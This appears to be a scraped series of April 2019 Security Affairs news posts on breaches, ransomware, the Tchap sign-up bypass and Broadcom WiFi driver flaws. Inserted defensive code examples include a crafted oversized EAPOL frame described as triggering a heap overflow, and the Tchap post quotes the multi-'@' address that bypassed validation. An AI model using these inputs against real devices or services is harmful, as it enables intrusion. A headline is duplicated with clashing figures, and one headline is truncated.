“We were able to get in touch with a couple of drivers with an attempt to identify the owner of the database. At the same time, my colleagues have reached out to the biggest ride-hailing companies in Iran to confirm data origin. ” concludes Diachenko.

“While I did not receive an official confirmation or comment from either company, we can only guess if this data was part of their infrastructure. However, no matter who owned it, the fact alone that such highly sensitive PII (personally identifiable information) was available in the wild for at least 3 days, is scary.”

Pierluigi Paganini

(SecurityAffairs – data leak,ride-hailing company)

The post Ride-Hailing Company operating in Iran exposes data of Iranian Drivers appeared first on Security Affairs.

Security Affairs newsletter Round 210 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Once again thank you!

Attackers hacked support agent to access Microsoft Outlook email accounts
Major coordinated disinformation campaign hit the Lithuanian Defense
Romanian duo convicted of fraud Scheme infecting 400,000 computers
Security Affairs newsletter Round 209 – News of the week
Whatsapp, Instagram, Facebook down worldwide
A new DDoS technique abuses HTML5 Hyperlink Audit Ping in massive attacks
Apache fixed an important RCE flaw in Tomcat application server
Gnosticplayers round 5 – 65 Million+ fresh accounts from 6 security breaches available for sale
Gnosticplayers round 5 – 65 Million+ fresh accounts from 8 security breaches available for sale
Locked Shields 2019 – Chapeau, France wins Cyber Defence Exercise
Yellow Pencil WordPress Plugin flaw expose tens of thousands of sites
Adblock Plus filter can be exploited to execute arbitrary code in web pages
Blue Cross of Idaho data breach, 5,600 customers affected
CVE-2019-0803 Windows flaw exploited to deliver PowerShell Backdoor
Ecuador suffered 40 Million Cyber attacks after the Julian Assange arrest
FireEye releases FLASHMINGO tool to analyze Adobe Flash files
Scranos – A Cross Platform, Rootkit-Enabled Spyware rapidly spreading
A new variant of HawkEye stealer emerges in the threat landscape
Code execution – Evernote
eGobbler hackers used Chrome bug to deliver 500Million+ ads to iOS users
European Commission is not in possession of evidence of issues with Kaspersky products
Justdial is leaking personal details of all customers real-time
RCE flaw in Electronic Arts Origin client exposes gamers to hack
Analyzing OilRigs malware that uses DNS Tunneling
APT28 and Upcoming Elections: evidence of possible interference (Part II)
Cisco addresses a critical bug in ASR 9000 series Routers
Drupal patched security vulnerabilities in Symfony, jQuery
Facebook ‘unintentionally collected contacts from 1.5 Million email accounts without permission
Russian TA505 threat actor target financial entities worldwide
Broadcom WiFi Driver bugs expose devices to hack
Facebook admitted to have stored millions of Instagram users passwords in plaintext
Operator of Codeshop Cybercrime Marketplace Sentenced to 90 months in prison
Ransomware attack knocks Weather Channel off the Air
Source code of tools used by OilRig APT leaked on Telegram
Avast, Avira, Sophos and other antivirus solutions show problems after
Google is going to block logins from embedded browsers against MitM phishing attacks
Hacker broke into super secure French Governments Messaging App Tchap hours after release
Marcus Hutchins pleads guilty to two counts of banking malware creation

Pierluigi Paganini

(SecurityAffairs – newsletter)



The post Security Affairs newsletter Round 210 – News of the week appeared first on Security Affairs.

60 Million records of LinkedIn users exposed online

A researcher discovered eight unsecured databases exposed online that contained approximately 60 million records of LinkedIn user data.

Researcher Sanyam Jain at the GDI Foundation discovered eight unsecured databases exposed online that contained approximately 60 million records of LinkedIn user data.

Most of the data is publicly available, but the databases also include users’ email addresses and internal data, such as the type of LinkedIn subscription, which suggests the source could be a data breach.

Records include LinkedIn public profile information, including IDs, profile URLs, work history, education history, location, listed skills, other social profiles, and the last time the profile was updated.

The archives contain 229 GB of data, each one containing between 25 GB and 32 GB of information. 

The researcher noticed that the huge trove of data was disappearing and reappearing online under different IP addresses every day.

Eventually the databases were no longer accessible, likely because they had been secured.

The mystery behind this discovery is that some users claim to have had their LinkedIn privacy settings configured to avoid publicly displaying some of the exposed personal details.

“Included in the profile was also my email address that I used when registering my LinkedIn account. It is not known how they gained access to this information as I have always had the LinkedIn privacy setting configured to not publicly display my email address.” reads the post published by BleepingComputer.

“After reviewing the data that was sent to me, I found all of the information to be accurate.”


At the time it is not clear who owns the databases; as of Monday, they were no longer accessible online.

Paul Rockwell, head of Trust & Safety at LinkedIn, told BleepingComputer that the databases do not belong to LinkedIn, but he confirmed that the company is aware of third-party databases containing scraped LinkedIn data.

Pierluigi Paganini

(SecurityAffairs – hacking, LinkedIn)

The post 60 Million records of LinkedIn users exposed online appeared first on Security Affairs.

INPIVX hidden service, a new way to organize ransomware attacks

A new service called Inpivx represents an evolution of the ransomware-as-a-service model, making it very easy for wannabe crooks to develop their own malware and build a management panel.

A new Tor hidden service called Inpivx evolves the concept of ransomware-as-a-service, making it very easy for crooks without technical skills to develop their own malware and build a management panel.

The operators sell the source code for both the ransomware and the management dashboard; having the source allows buyers to customize the ransomware.

Note that Inpivx is not a RaaS in the strict sense: it sells code and does not supply hosting services.

The ransomware is written in C++ and supports almost any Windows OS version, from Windows XP through Windows 10, while the dashboard is coded in PHP.

The package goes for $500 and also includes the decryption tool; the operators also provide a detailed tutorial.

“If the client has no skill, we provide a tutorial based on our own ransomware dashboard each line of code has an explanation,” an Inpivx member told BleepingComputer.

The dashboard provides infection data in real time, it includes the total number of encrypted files, number of infections, the operating systems of the infected machines and their geographical distribution.

It also implements a chat that allows operators to communicate with the victims.

A specific clients section includes information on infected machines, such as the victim IDs, the operating system, the ransom price, the decryption key, and the payment status.

“Inpivx approach is highly likely to attract to the ransomware game individuals with expertise in other areas of the crime business.” wrote Ionut Ilascu from BleepingComputer. “With access to the source code, they can alter the original ransomware product and create new strains that could evolve to something new by combining code from other malware.”

Pierluigi Paganini

(SecurityAffairs – Tor, Inpivx)

The post INPIVX hidden service, a new way to organize ransomware attacks appeared first on Security Affairs.

Marcus Hutchins pleads guilty to two counts of banking malware creation

British malware researcher Marcus Hutchins has pleaded guilty to developing and sharing banking malware between July 2014 and July 2015.

The popular British cybersecurity expert Marcus Hutchins has pleaded guilty to developing and sharing the Kronos banking malware between July 2014 and July 2015.

Marcus Hutchins, also known as MalwareTech, made the headlines after discovering the “kill switch” that halted the WannaCry ransomware outbreak. In August 2017, he was arrested in Las Vegas after attending the Def Con hacking conference and was detained by the FBI in Nevada.

In August 2017, Marcus Hutchins pleaded not guilty to charges of creating and selling malware at a hearing in Milwaukee, Wisconsin. The court relaxed his bail terms, allowing him to access the Internet and continue his ordinary work; the only restriction was that he could not visit the WannaCry kill-switch domain.

The decision is unusual because computer crime suspects are usually not allowed to stay online.

The court allowed him to live in Los Angeles, where the company that hired him is located, but he had to surrender his passport and wear a tracking device until his trial in October.

On Friday, Hutchins accepted a plea deal and admitted two charges of malware development.

“I’ve pleaded guilty to two charges related to writing malware in the years prior to my career in security,” reads a statement published by the expert.

“I regret these actions and accept full responsibility for my mistakes. Having grown up, I’ve since been using the same skills that I misused several years ago for constructive purposes. I will continue to devote my time to keeping people safe from malware attacks.”

Marcus Hutchins faces a maximum penalty of five years in prison, a $250,000 fine and a year of probation.

According to federal law enforcement, the researcher told an unnamed associate over a recorded telephone line: “I used to write malware, they picked me up on some old shit,” and “I wrote code for a guy a while back who then incorporated it into a banking malware.”

Pierluigi Paganini

(Security Affairs – Marcus Hutchins, cybercrime)

The post Marcus Hutchins pleads guilty to two counts of banking malware creation appeared first on Security Affairs.

Avast, Avira, Sophos and other antivirus solutions show problems after

Antivirus solutions from several vendors, including McAfee, Avast and Sophos, are malfunctioning after the installation of the Windows security patches released on April 9.

Antivirus solutions from Sophos, Avira, ArcaBit, Avast, and more recently McAfee, have reported problems after the installation of the fixes released by Microsoft on April 9.

Microsoft is aware of the problems reported by users and has added several antivirus products to the list of known issues for these updates.

Users of the affected machines are observing sudden system freezes and performance degradation.

In some cases, users of systems running Windows 7, 8.1, Server 2008 R2, Server 2012, and Server 2012 R2 reported that they were able to log in, but that the process took more than ten hours.

Safe mode is not affected by the issue, so experts suggest booting into safe mode to disable the antivirus and allow the machine to boot normally.

“Sophos additionally reports that adding the antivirus software’s own directory to the list of excluded locations also serves as a fix, which is a little strange.” reported ArsTechnica.

“Avast recommends leaving systems at the login screen for about 15 minutes and then rebooting; the antivirus software should then update itself automatically in the background.”

Microsoft has blocked the updates for systems running Sophos, Avira, and ArcaBit. McAfee is investigating the issue, while ArcaBit and Avast have already released updates that address the problem.

According to experts at Avast and McAfee, the root cause is a change Microsoft made to CSRSS (the “client/server runtime subsystem” that manages Win32 applications); the antivirus solutions appear to block while attempting to access some resource.

At the time it was difficult to understand what had happened and whether the problem could be solved definitively by antivirus updates or by fixes to the operating system.

Pierluigi Paganini

(SecurityAffairs – hacking, antivirus)

The post Avast, Avira, Sophos and other antivirus solutions show problems after appeared first on Security Affairs.

Google is going to block logins from embedded browsers against MitM phishing attacks

Google this week announced that it is going to block login attempts from embedded browser frameworks to prevent man-in-the-middle (MiTM) phishing attacks.

Phishing attacks that intercept and manipulate otherwise legitimate traffic are difficult to detect when the attacker uses an embedded browser framework or another automation tool to perform the authentication.

For example, the Chromium Embedded Framework (CEF) allows embedding a Chromium-based browser in other applications; from Google’s side, a sign-in flow driven from inside such a framework is indistinguishable from one driven by a MITM phishing kit.

Google announced that starting from June, it will block sign-ins from these frameworks.

“However, one form of phishing, known as “man in the middle” (MITM), is hard to detect when an embedded browser framework (e.g., Chromium Embedded Framework – CEF) or another automation platform is being used for authentication. MITM intercepts the communications between a user and Google in real-time to gather the user’s credentials (including the second factor in some cases) and sign in.” reads a blog post published by Google. “Because we can’t differentiate between a legitimate sign in and a MITM attack on these platforms, we will be blocking sign-ins from embedded browser frameworks starting in June. This is similar to the restriction on webview sign-ins announced in April 2016.”


Google suggests that developers currently using CEF for authentication switch to browser-based OAuth authentication.

Browser-based OAuth authentication also lets users see the full URL of the page where they are entering their credentials, which helps them spot phishing sites mimicking legitimate ones.

“The solution for developers currently using CEF for authentication is the same: browser-based OAuth authentication. Aside from being secure, it also enables users to see the full URL of the page where they are entering their credentials, reinforcing good anti-phishing practices,” continues Google.

“If you are a developer with an app that requires access to Google Account data, switch to using browser-based OAuth authentication today.”

Pierluigi Paganini

(SecurityAffairs – hacking, MiTM phishing attack)

The post Google is going to block logins from embedded browsers against MitM phishing attacks appeared first on Security Affairs.

Hacker broke into super secure French Government’s Messaging App Tchap hours after release

A white hat hacker discovered how to break Tchap, a new secure messaging app launched by the French government for officials and politicians.

The popular French white hat hacker Robert Baptiste (aka @fs0c131y) discovered how to break into Tchap, a new secure messaging app launched by the French government for encrypted communications between officials and politicians.

The app was developed by DINSIC (Interministerial Directorate of Digital and Information System and Communication of the State), as a project overseen by France’s National Cybersecurity Agency (ANSSI).

It aims at replacing popular instant messaging services like Telegram and WhatsApp for government staff.

Tchap was launched on April 18 and is available on the official iOS and Android app stores, but only French government employees (using @gouv.fr or @elysee.fr email accounts) can sign up for an account.

The key point of Tchap is that encrypted communications flow through servers under the government’s control, to keep them out of reach of foreign nation-state actors.

The French government published Tchap’s source code on GitHub; it is based on Riot, a well-known open-source client for the Matrix messaging protocol.

News of the day is that Robert Baptiste found a security bug that could allow anyone to sign up an account with the Tchap app and access groups and channels without using an official government email account.

The expert performed a dynamic analysis of the mobile app and found that it implements certificate pinning in the authentication process. After disabling the pinning with Frida, he observed that during registration the app sends a requestToken request.


He noticed that, depending on the email address provided by the user, the app selects the matching id_server; the list of available servers is defined in the AndroidManifest.xml.

“I set id_server to matrix.agent.elysee.tchap.gouv.fr. For info, Elysée is the French presidential palace. As I chose this server I guessed I should have an @elysee.fr email address. So, in the requestToken request, I modified email to fs0c131y@protonmail.com@elysee.fr. Hum, no validation email in my inbox… Wait, maybe it is waiting for a known @elysee.fr email address. So I did a Google search “email @elysee.fr”,” wrote the expert in a blog post.

“So I did another try and in the requestToken request I modified email to fs0c131y@protonmail.com@presidence@elysee.fr. Bingo! I received an email from Tchap, I was able to validate my account!”

The expert thus demonstrated how to create an account with a regular email address by exploiting an email validation flaw in the Android version of the Tchap app: an address containing several “@” characters but ending in @elysee.fr was accepted as an Élysée address.

Once logged in as an Élysée user, he was able to access the public rooms.
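The address that slipped through, “fs0c131y@protonmail.com@presidence@elysee.fr”, passes any check that only looks at how the string ends. The following is an added example (Python, not Tchap's or Riot's code) contrasting that kind of suffix match with a check that parses the address first and compares the parsed domain against the allow-list. The domain-to-id_server map is an assumption built from the domains and the one server name the article mentions; the second server name is a placeholder, and the real AndroidManifest.xml mapping is not reproduced.

```python
"""
Added example, not Tchap's or Riot's code: two ways a client can map a
sign-up address to an allowed domain. The weak variant accepts any string
that ends with an allowed domain; the strict variant parses the address
first and compares only the parsed domain against the allow-list.
"""
import re

# domain -> identity server. The elysee.fr entry uses the server name the
# article quotes; the gouv.fr server name is a placeholder (assumption).
ALLOWED_DOMAINS = {
    "elysee.fr": "matrix.agent.elysee.tchap.gouv.fr",
    "gouv.fr": "id-server-for-gouv.example",   # hypothetical
}

# One hostname label (RFC 1034 style) and a conservative local-part alphabet.
_LABEL = re.compile(r"^[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$", re.I)
_LOCAL = re.compile(r"^[a-z0-9!#$%&'*+/=?^_`{|}~.-]{1,64}$", re.I)


def weak_pick_id_server(email: str):
    """Suffix match, as a naive client might do it.

    "x@attacker.example@elysee.fr" ends with "@elysee.fr", so it is accepted.
    """
    for domain, server in ALLOWED_DOMAINS.items():
        if email.lower().endswith("@" + domain):
            return server
    return None


def parse_address(email: str):
    """Split an address into (local, domain) or raise ValueError.

    Exactly one '@' is allowed, the local part must use a restricted
    alphabet without leading/trailing/double dots, and every domain label
    must be a valid hostname label.
    """
    if email.count("@") != 1:
        raise ValueError("address must contain exactly one '@'")
    local, domain = email.split("@")
    if (not _LOCAL.match(local) or local.startswith(".")
            or local.endswith(".") or ".." in local):
        raise ValueError("invalid local part")
    labels = domain.lower().split(".")
    if len(labels) < 2 or not all(_LABEL.match(lbl) for lbl in labels):
        raise ValueError("invalid domain")
    return local, domain.lower()


def strict_pick_id_server(email: str):
    """Parse first, then compare the parsed domain against the allow-list."""
    try:
        _, domain = parse_address(email)
    except ValueError:
        return None
    # Exact match: sub.elysee.fr is deliberately not treated as elysee.fr.
    return ALLOWED_DOMAINS.get(domain)


# The address from the article, and a plain one, for comparison.
CRAFTED = "fs0c131y@protonmail.com@presidence@elysee.fr"
LEGIT = "alice@elysee.fr"
```

Two points worth keeping from this. An exact match on the parsed domain rejects sub.elysee.fr as well; whether subdomains should count is a policy decision, not something the parser should guess. And since the client picks the id_server, the server that sends the validation email is the component that must re-derive the domain from the parsed address and refuse anything that is not on its own list; the client-side check only improves the user experience.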


Robert reported the issue to the Matrix team, which develops the Riot client, and a fix was quickly released. The patch was specific to Tchap, the French government's Riot-based application.

Incidentally, last week Matrix.org warned users of a security breach: an attacker gained unauthorized access to its production databases, including unencrypted message data, access tokens and password hashes.

According to Matrix.org, the attacker exploited a known vulnerability in the Jenkins open source automation server to hijack credentials and gain access to the organization's systems. Homeservers, source code and packages, identity servers and Modular.im servers were not impacted.

Pierluigi Paganini

(SecurityAffairs – hacking, Tchap app)


Facebook admitted to have stored millions of Instagram users’ passwords in plaintext

More problems for Facebook, which admitted to having stored millions of Instagram users' passwords in plaintext.

Yesterday, Facebook made the headlines once again for alleged violations of its users' privacy: the company admitted it had ‘unintentionally’ collected contacts from 1.5 million email accounts without permission.

In March, Facebook admitted to having stored the passwords of hundreds of millions of users in plain text, including “tens of thousands” of passwords belonging to Instagram users.

Unfortunately the issue was bigger than initially reported: the company updated its original press release, confirming that millions of Instagram users were affected.

The discovery was made in January by Facebook staff during a routine security review. The passwords were stored in plain text on internal data storage systems, so they were not exposed outside the company but were readable by employees.

Facebook quickly fixed the issue and notified the affected users.

Now Facebook confirmed to have discovered “additional logs of Instagram passwords” stored in a readable format. The social network giant pointed out that the passwords were never “abused or improperly accessed” by any of its employees.

“Since this post was published, we discovered additional logs of Instagram passwords being stored in a readable format. We now estimate that this issue impacted millions of Instagram users. We will be notifying these users as we did the others. Our investigation has determined that these stored passwords were not internally abused or improperly accessed,” reads the updated statement.


In short, millions of Instagram users had their account passwords stored in plain text, searchable by thousands of Facebook employees.
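Passwords usually end up in “logs stored in a readable format” because request parameters or bodies are written to application logs before any field is redacted. The following is an added example (Python, not Facebook's or Instagram's code) of a log filter that scrubs password, token and Authorization values from log lines, and of the audit the same patterns enable: finding the lines that already hold unredacted secrets. The log lines are constructed for the example, and the field names are assumptions about what a login or password-change endpoint might log.

```python
"""
Added example, not Facebook's or Instagram's code: redact credential-bearing
fields from application log lines, and scan an existing log for lines that
still carry them in readable form.
"""
import re

# Field names assumed for the example; extend to match your own endpoints.
SENSITIVE_KEYS = ("password", "passwd", "new_password", "old_password", "token", "secret")
_KEYS = "|".join(SENSITIVE_KEYS)

# Each pattern keeps the key and replaces only the value.
PATTERNS = [
    # form/query style: password=hunter2   (value stops at '&', whitespace or ';')
    (re.compile(rf"(\b(?:{_KEYS})\s*=\s*)([^&\s;]+)", re.I), r"\1[REDACTED]"),
    # JSON style: "new_password":"S3cure!pw"
    (re.compile(rf'("(?:{_KEYS})"\s*:\s*")([^"]*)(")', re.I), r"\1[REDACTED]\3"),
    # HTTP Authorization header: authorization: Bearer eyJ...
    (re.compile(r"(authorization:\s*)(?:bearer|basic)\s+\S+", re.I), r"\1[REDACTED]"),
]


def redact_line(line: str) -> str:
    """Return the line with every recognised secret value replaced."""
    for pattern, repl in PATTERNS:
        line = pattern.sub(repl, line)
    return line


def scan_for_leaks(lines) -> list:
    """1-based numbers of the lines whose content changes under redaction,
    i.e. lines that hold a secret in readable form. Useful for auditing logs
    that were written before the filter was in place."""
    return [i for i, line in enumerate(lines, 1) if redact_line(line) != line]


# Constructed sample log lines (not real traffic).
SAMPLE_LINES = [
    "2019-04-18T10:11:12Z POST /accounts/login/ body=username=alice&password=hunter2 status=200",
    '2019-04-18T10:11:13Z POST /api/v1/accounts/change_password/ body={"old_password":"hunter2","new_password":"S3cure!pw"} status=200',
    "2019-04-18T10:11:14Z GET /api/v1/users/self/ authorization: Bearer eyJhbGciOiJIUzI1NiJ9.e30.abc status=200",
    "2019-04-18T10:11:15Z GET /static/app.js status=200",
]

if __name__ == "__main__":
    for n in scan_for_leaks(SAMPLE_LINES):
        print(f"line {n} leaks a secret -> {redact_line(SAMPLE_LINES[n - 1])}")
```

Redaction at the logging layer is a backstop, not the fix: the login handler should never hand the raw request body to the logger in the first place, and the scan function is there to measure how much of the existing archive needs purging once a leak like this is found.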

Affected users should change their password, choosing a strong and unique one, and enable two-factor authentication.

Pierluigi Paganini

(SecurityAffairs – Instagram, privacy)


Operator of Codeshop Cybercrime Marketplace Sentenced to 90 months in prison

Djevair Ametovski was sentenced to 90 months in prison for operating an international cybercrime marketplace named Codeshop.

Macedonian national Djevair Ametovski (32) was sentenced in the United States to 90 months in prison for operating an international cybercrime marketplace named Codeshop, the Department of Justice announced.

Codeshop.su was a website that specialized in selling stolen payment card data. Ametovski acquired payment card data from hackers who had stolen it from financial institutions and individuals.

According to the investigators, the man commercialized data of 181,000 payment cards between 2010 and 2014.


Ametovski (known online as Codeshop, Sindromx, xhevo and Sindrom) was arrested by Slovenian authorities in January 2014; at the time he was charged with aggravated identity theft, access device fraud conspiracy and wire fraud conspiracy. He was extradited to the United States in May 2016.

The man pleaded guilty to access device fraud and aggravated identity theft; he was also ordered to forfeit $250,000 and to pay restitution in an amount to be determined later.

Codeshop customers could search the stolen card data by criteria such as country, issuing bank and bank identification number (BIN).

“The stolen data could then be used to make online purchases and to encode plastic cards to withdraw cash at ATMs,” reads the Justice Department press release.

“Ametovski used a network of online money exchangers and anonymous digital currencies, including Bitcoin, to reap revenues from the Codeshop website and to conceal all participants’ identities, including his own. Over the course of the scheme, Ametovski obtained and sold stolen credit and debit card data for more than 1.3 million cards,” said the Justice Department.

Pierluigi Paganini

(SecurityAffairs – Codeshop, carding)


Source code of tools used by OilRig APT leaked on Telegram

Lab Dookhtegan hackers leaked details about operations carried out by Iran-linked OilRig group, including source code of 6 tools.

An entity going by the name Lab Dookhtegan has disclosed details about operations conducted by the Iran-linked cyber-espionage group tracked as OilRig, APT34 and HelixKitten.

OilRig is an Iran-linked APT group that has been around since at least 2014, it targeted mainly organizations in the financial, government, energy, telecoms and chemical sectors in the United States and Middle Eastern countries.

The Lab Dookhtegan hackers used a Telegram channel to dump information about the OilRig infrastructure, revealing details about its hacking tools, members, and operations. The hackers also disclosed IP addresses and domains involved in operations conducted by the group over the years.

OilRig dump (source: ZDNet)

It seems that the tools have been leaked since mid-March on a Telegram channel by a user with the Lab Dookhtegan pseudonym.

The dump also includes OilRig victims’ data, including login credentials to several services obtained through phishing attacks.

The entity that leaked the information aimed to disrupt the operations of the Iran-linked group and is likely an opponent of the regime.

Lab Dookhtegan leaked the source code of the following six hacking tools, along with data from the tools' compromised admin panels:

  • Glimpse (aka BondUpdater), the latest version of the PowerShell-based trojan;
  • PoisonFrog, an older version of BondUpdater;
  • HyperShell web shell (aka TwoFace);
  • HighShell web shell;
  • Fox Panel phishing tool;
  • Webmask, the main tool behind DNSpionage;

According to Chronicle, Dookhtegan leaked data from 66 victims in private industry and Government organizations, most from the Middle East, Africa, East Asia, and Europe.

The list of victims includes Etihad Airways and Emirates National Oil; the group hit organizations across industries including energy, transportation and finance.

Lab Dookhtegan also doxxed Iranian Ministry of Intelligence officers: the leak includes phone numbers, images, social media profiles and names of officers allegedly involved in APT34 operations.

“We have more secret information about the crimes of the Iranian Ministry of Intelligence and its managers and we are determined to continue to expose them,” Dookhtegan said in a Telegram message.

The leak will likely have a severe impact on the future operations of the OilRig group, whose tooling and infrastructure are now public.

Pierluigi Paganini

(SecurityAffairs – hacking, OilRig)


Ransomware attack knocks Weather Channel off the Air

A ransomware attack knocked the Weather Channel off the air for at least 90 minutes on Thursday morning; federal law enforcement is investigating the incident.

A cyber attack hit the Weather Channel and forced it off the air for at least 90 minutes.

The broadcaster confirmed via Twitter that the outage was the result of “a malicious software attack on the network”, but the tweet gave no further detail.

That morning the broadcaster aired taped programming (“Heavy Rescue”) instead of the live “AMHQ” show.

The live show started more than 90 minutes late, with the anchors informing viewers of the cyber attack. IT staff restored normal operations from backups.


Federal law enforcement immediately opened an investigation; at the time, The Weather Channel did not disclose technical details about the attack.

According to 11 Alive News, the attack involved ransomware, a circumstance that federal officials confirmed to The Wall Street Journal. The live show was interrupted by a ransomware infection, likely an attempt to extort money from the broadcaster.

Ransomware attacks continue to represent a serious threat to companies and organizations; it is essential to adopt good cyber hygiene: run endpoint protection, keep applications up to date, and maintain a backup policy whose backups are tested and kept offline or otherwise isolated, since ransomware routinely encrypts any backup it can reach.

Pierluigi Paganini

(SecurityAffairs – ransomware, Weather Channel)

Broadcom WiFi Driver bugs expose devices to hack

Experts warn of security flaws in the Broadcom WiFi chipset drivers that could allow potential attackers to remotely execute arbitrary code and to trigger DoS.

According to a DHS/CISA alert and a CERT/CC vulnerability note, Broadcom WiFi chipset drivers are affected by security vulnerabilities impacting multiple operating systems. The flaws could be exploited to remotely execute arbitrary code and to trigger a denial-of-service condition.

“The CERT Coordination Center (CERT/CC) has released information on multiple vulnerabilities in Broadcom Wi-Fi chipset drivers. A remote attacker could exploit some of these vulnerabilities to take control of an affected system.” reads the alert published by the DHS/CISA.

“The Broadcom wl driver and the open-source brcmfmac driver for Broadcom WiFi chipsets contain multiple vulnerabilities. The Broadcom wl driver is vulnerable to two heap buffer overflows, and the open-source brcmfmac driver is vulnerable to a frame validation bypass and a heap buffer overflow.” reads the security advisory published by the CERT/CC.

The CERT/CC vulnerability note includes a list of all vendors potentially impacted by the flaws in Broadcom WiFi chipsets.

The flaws, discovered by Hugues Anguelkov during his internship at Quarkslab, are tracked as CVE-2019-8564, CVE-2019-9500, CVE-2019-9501, CVE-2019-9502 and CVE-2019-9503.

The heap buffer overflows could be exploited to execute arbitrary code on vulnerable systems.

“You can find these chips almost everywhere from smartphones to laptops, smart-TVs and IoT devices. You probably use one without knowing it, for example if you have a Dell laptop, you may be using a bcm43224 or a bcm4352 card. It is also likely you use a Broadcom WiFi chip if you have an iPhone, a MacBook, a Samsung phone or a Huawei phone, etc.” reads the post published by Anguelkov.

“Since these chips are so widespread they constitute a high value target to attackers and any vulnerability found in them should be considered to pose high risk.”


According to the CERT/CC, “In the worst case scenario, by sending specially-crafted WiFi packets, a remote, unauthenticated attacker may be able to execute arbitrary code on a vulnerable system. More typically, these vulnerabilities will result in denial-of-service attacks.”

Anguelkov confirmed that two of the vulnerabilities are present both in the Linux kernel driver and in the firmware of the affected Broadcom chips.

The researcher pointed out that the most common exploitation scenario leads to a remote denial of service.

“Although it is technically challenging to achieve, exploitation for remote code execution should not be discarded as the worst case scenario.” Anguelkov adds.

Below are the details of the flaws.

Vulnerabilities in the open source brcmfmac driver:

  • CVE-2019-9503: when the brcmfmac driver receives a firmware event frame from the host, the appropriate handler is called. This frame validation can be bypassed when USB is used as the bus (for instance with a USB WiFi dongle), in which case firmware event frames from a remote source are processed.
  • CVE-2019-9500: a malicious event frame can be crafted to trigger a heap buffer overflow in the brcmf_wowl_nd_results function when the Wake-up on Wireless LAN functionality is configured. A compromised chipset could exploit this flaw to compromise the host, and in combination with the frame validation bypass above it can be triggered remotely.

Vulnerabilities in the Broadcom wl driver:

Two heap buffer overflows can be triggered in the client when it parses EAPOL message 3 of the 4-way handshake sent by the access point (AP):

  • CVE-2019-9501: supplying a vendor information element with a data length larger than 32 bytes triggers a heap buffer overflow in wlc_wpa_sup_eapol.
  • CVE-2019-9502: supplying a vendor information element with a data length larger than 164 bytes triggers a heap buffer overflow in wlc_wpa_plumb_gtk.

NOTE: when the wl driver is used with SoftMAC chipsets, these vulnerabilities are triggered in the host’s kernel. When a FullMAC chipset is used, they are triggered in the chipset’s firmware.
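Both wl bugs have the same shape: a length byte from the air decides how much of a vendor information element gets copied into a fixed-size heap buffer, and nothing compares the two. The following is an added example (Python; a model, not the Broadcom driver's code) that walks the TLV elements in the key data of message 3 and refuses to hand a vendor element to a handler whose buffer it would not fit. The 32- and 164-byte capacities are the thresholds reported above; which vendor element each real handler copies is not stated there, so mapping the WPA IE to wlc_wpa_sup_eapol and the GTK KDE to wlc_wpa_plumb_gtk is an assumption for illustration, and the sample frames are constructed.

```python
"""
Added example, not the Broadcom wl driver's code: a model of the bounds check
missing from the two EAPOL message 3 overflows (CVE-2019-9501/-9502).
"""
import struct

VENDOR_SPECIFIC = 0xDD   # 802.11 element ID shared by the WPA IE and the GTK KDE
RSN_IE = 0x30            # RSN information element

# (element id, OUI, OUI type) -> (handler name, capacity of its copy buffer).
# Capacities are the reported thresholds; the element-to-handler mapping is
# an assumption made for this example.
HANDLERS = {
    (VENDOR_SPECIFIC, b"\x00\x50\xf2", 0x01): ("wlc_wpa_sup_eapol", 32),   # Microsoft OUI, WPA IE
    (VENDOR_SPECIFIC, b"\x00\x0f\xac", 0x01): ("wlc_wpa_plumb_gtk", 164),  # 802.11 OUI, GTK KDE
}


class MalformedKeyData(ValueError):
    """Raised for truncated elements or elements that would overrun a buffer."""


def parse_ies(key_data: bytes):
    """Yield (element_id, body) for each TLV element: 1-byte ID, 1-byte length, body."""
    off = 0
    while off < len(key_data):
        if off + 2 > len(key_data):
            raise MalformedKeyData(f"truncated element header at offset {off}")
        eid, length = key_data[off], key_data[off + 1]
        body = key_data[off + 2 : off + 2 + length]
        if len(body) != length:
            raise MalformedKeyData(f"element 0x{eid:02x} claims {length} bytes, {len(body)} present")
        yield eid, body
        off += 2 + length


def dispatch_key_data(key_data: bytes) -> list:
    """Return [(handler, body_length)] for each vendor element that is safe to copy.

    The comparison against `capacity` is the check the vulnerable paths lacked:
    the body is about to be copied into a fixed-size heap buffer, so it must fit.
    """
    dispatched = []
    for eid, body in parse_ies(key_data):
        if eid != VENDOR_SPECIFIC or len(body) < 4:
            continue                    # RSN IE and non-vendor elements: handled elsewhere
        key = (eid, body[:3], body[3])
        if key not in HANDLERS:
            continue                    # unknown vendor element: ignore it
        handler, capacity = HANDLERS[key]
        if len(body) > capacity:
            raise MalformedKeyData(f"{handler}: {len(body)}-byte element exceeds {capacity}-byte buffer")
        dispatched.append((handler, len(body)))
    return dispatched


def is_safe_key_data(key_data: bytes) -> bool:
    """True if every element parses and fits its handler's buffer."""
    try:
        dispatch_key_data(key_data)
        return True
    except MalformedKeyData:
        return False


def ie(eid: int, body: bytes) -> bytes:
    """Encode one element as ID, length, body."""
    return struct.pack("BB", eid, len(body)) + body


# Constructed key data: an RSN IE, a normal 22-byte WPA IE and a GTK KDE
# carrying a 16-byte group key. Every element fits its handler's buffer.
RSN = ie(RSN_IE, bytes.fromhex("0100000fac040100000fac040100000fac020000"))
WPA_IE = ie(VENDOR_SPECIFIC, bytes.fromhex("0050f20101000050f20201000050f20201000050f202"))
GTK_KDE = ie(VENDOR_SPECIFIC, b"\x00\x0f\xac\x01" + b"\x01\x00" + bytes(range(16)))
BENIGN_MSG3 = RSN + WPA_IE + GTK_KDE

# Same layout, but the WPA IE body is padded to 48 bytes (> 32): an AP sending
# this would reach the wlc_wpa_sup_eapol overflow on an unpatched client.
OVERSIZED_MSG3 = RSN + ie(VENDOR_SPECIFIC, b"\x00\x50\xf2\x01" + b"\x41" * 44) + GTK_KDE
```

The order matters: the length is validated before any handler sees the body, and the check lives in the dispatcher rather than in each handler, so a new handler cannot forget it. The same structure applies in the driver's C, where the copy is a memcpy into a heap allocation sized for the expected element.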

The researcher published a timeline for the vulnerabilities that include information on patches released by some vendors.

Pierluigi Paganini

(SecurityAffairs – hacking, Broadcom WiFi chipset)


Analyzing OilRig’s malware that uses DNS Tunneling

Iran-linked APT group OilRig is heavily leveraging DNS tunneling for its cyber espionage campaigns, Palo Alto Networks reveals.

Security researchers at Palo Alto Networks reported that the Iran-linked APT group OilRig relies heavily on DNS tunneling in its cyber espionage campaigns.

OilRig is an Iran-linked APT group that has been around since at least 2014, it targeted mainly organizations in the financial, government, energy, telecoms and chemical sectors in the United States and Middle Eastern countries.

